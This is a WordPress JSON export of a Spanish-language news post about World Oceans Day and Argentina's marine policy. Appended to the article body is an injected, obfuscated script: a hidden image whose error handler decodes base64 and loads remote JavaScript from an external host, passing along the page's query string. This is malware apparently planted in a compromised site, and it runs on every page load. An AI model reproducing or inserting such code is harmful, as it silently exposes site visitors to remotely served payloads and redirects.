{"id":6865,"date":"2023-06-09T12:00:45","date_gmt":"2023-06-09T15:00:45","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6865"},"modified":"2025-08-13T15:59:16","modified_gmt":"2025-08-13T18:59:16","slug":"8-de-junio-se-celebro-el-dia-mundial-de-los-oceanos","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6865","title":{"rendered":"8 de junio se celebro el D\u00eda Mundial de los Oc\u00e9anos"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La Argentina, pa\u00eds oce\u00e1nico y bicontinental, reafirma su compromiso con el cuidado y uso sostenible de los recursos marinos.<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg\" alt=\"\" class=\"wp-image-6825\" width=\"298\" height=\"420\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg 727w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-213x300.jpg 213w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-768x1082.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1091x1536.jpg 1091w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-696x980.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1068x1504.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-298x420.jpg 298w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-320x451.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-480x676.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-800x1127.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007.jpg 1136w\" sizes=\"(max-width: 298px) 100vw, 298px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><mark>Publicidad:<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El 8 de junio se celebra el D\u00eda Mundial de los Oc\u00e9anos, el cual fue establecido por la Resoluci\u00f3n 63\/111 de la Asamblea General de Naciones Unidas en el a\u00f1o 2008, con el objetivo de recordar el papel crucial que los oc\u00e9anos desempe\u00f1an en nuestras vidas y las formas en que se puede contribuir a su protecci\u00f3n. Este a\u00f1o se celebra bajo el tema&nbsp; \u201c<strong>Planeta oce\u00e1nico: Las corrientes est\u00e1n cambiando<\/strong>\u201d.<\/p>\n\n\n\n<p>El compromiso que la Argentina tiene con la conservaci\u00f3n y el uso sostenible de los oc\u00e9anos y sus recursos se encuentra en l\u00ednea con el Objetivo de Desarrollo Sostenible 14&nbsp; de la Agenda 2030 y da cuenta de la importancia de los espacios mar\u00edtimos de nuestro pa\u00eds, los cuales superan ampliamente el territorio continental.<\/p>\n\n\n\n<p>Como parte de las pol\u00edticas p\u00fablicas oce\u00e1nicas argentinas cabe destacar a la iniciativa Pampa Azul, de car\u00e1cter estrat\u00e9gico e interministerial, en la cual participa esta Canciller\u00eda, y que se encuentra dirigida a promover el conocimiento cient\u00edfico, impulsar innovaciones tecnol\u00f3gicas que contribuyan al fortalecimiento de las industrias vinculadas al mar y al desarrollo econ\u00f3mico de las regiones mar\u00edtimas, y que constituye una excelente plataforma de cooperaci\u00f3n para la investigaci\u00f3n cient\u00edfica marina. Impulsada por esta iniciativa, se llev\u00f3 adelante entre febrero y abril de este a\u00f1o la campa\u00f1a de investigaci\u00f3n pesquera en las Islas Georgias del Sur, a bordo del Buque de Investigaci\u00f3n Pesquera Oceanogr\u00e1fica V\u00edctor Angelescu, del Instituto Nacional de Investigaci\u00f3n y Desarrollo Pesquero. La campa\u00f1a, desarrollada en el marco de la Convenci\u00f3n sobre la Conservaci\u00f3n de los Recursos Vivos Marinos Ant\u00e1rticos, constituye una actividad&nbsp; de gran importancia, puesto que permitir\u00e1 reforzar el conocimiento cient\u00edfico sobre las especies que habitan la zona,&nbsp; particularmente respecto de la pesquer\u00eda de merluza negra, a efectos de fortalecer su sostenibilidad.<\/p>\n\n\n\n<p>Asimismo, es pertinente destacar el rol del Sistema Nacional de&nbsp; \u00c1reas Marinas Protegidas y la implementaci\u00f3n de un enfoque ecosist\u00e9mico de la pesca, que sumado a&nbsp; la participaci\u00f3n activa y al liderazgo de nuestro pa\u00eds en los distintos foros internacionales vinculados a los oc\u00e9anos, dan cuenta de la relevancia de las cuestiones oce\u00e1nicas para la Argentina y su pol\u00edtica exterior.<\/p>\n\n\n\n<p>En l\u00ednea con lo expresado, es de importancia resaltar el impulso que nuestro pa\u00eds otorg\u00f3 a la revitalizaci\u00f3n de la Zona de Paz y Cooperaci\u00f3n del Atl\u00e1ntico Sur (ZPCAS), iniciativa que nuclea a 24 Estados ribere\u00f1os de Africa y Sudam\u00e9rica y representa un \u00e1mbito preponderante para promover la cooperaci\u00f3n Sur-Sur, y constituye una plataforma en donde la Argentina continuamente reafirma sus derechos de soberan\u00eda sobre las Islas Malvinas, Georgias del Sur, S\u00e1ndwich del Sur y los espacios mar\u00edtimos circundantes. A su vez, en este foro habitualmente se condena la presencia militar brit\u00e1nica en el Atl\u00e1ntico Sur, se reafirma la importancia de no permitir la presencia de armas nucleares en dicha zona y de preservarla de tensiones pol\u00edticas extrarregionales. Lo afirmado qued\u00f3 reflejado en la reciente Reuni\u00f3n Ministerial de ZPCAS, que tuvo lugar Mindelo, Cabo Verde, en abril de este a\u00f1o y en la Declaraci\u00f3n y el Plan de Acci\u00f3n all\u00ed adoptados.<\/p>\n\n\n\n<p>A su vez, la Argentina se congratula por el hecho de que en marzo de este a\u00f1o y, tras casi dos d\u00e9cadas de trabajo, finalizaron las negociaciones del tratado sobre conservaci\u00f3n y uso sostenible de la diversidad biol\u00f3gica marina en espacios fuera de la jurisdicci\u00f3n nacional (proceso conocido como&nbsp; BBNJ ). Este acuerdo se basa en el legado de la Convenci\u00f3n de Naciones Unidas sobre Derecho del Mar, la&nbsp; Constituci\u00f3n de los Oc\u00e9anos . Este avance constituye un enorme logro para el multilateralismo en sus esfuerzos para enfrentar los desaf\u00edos que representa la preservaci\u00f3n de la salud de los oc\u00e9anos para las generaciones presentes y futuras.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Argentina, pa\u00eds oce\u00e1nico y bicontinental, reafirma su compromiso con el cuidado y uso sostenible de los recursos marinos. El 8 de junio se celebra el D\u00eda Mundial de los Oc\u00e9anos, el cual fue establecido por la Resoluci\u00f3n 63\/111 de la Asamblea General de Naciones Unidas en el a\u00f1o 2008, con el objetivo de recordar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6866,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-6865","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6865"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6865\/revisions"}],"predecessor-version":[{"id":10386,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6865\/revisions\/10386"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6866"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}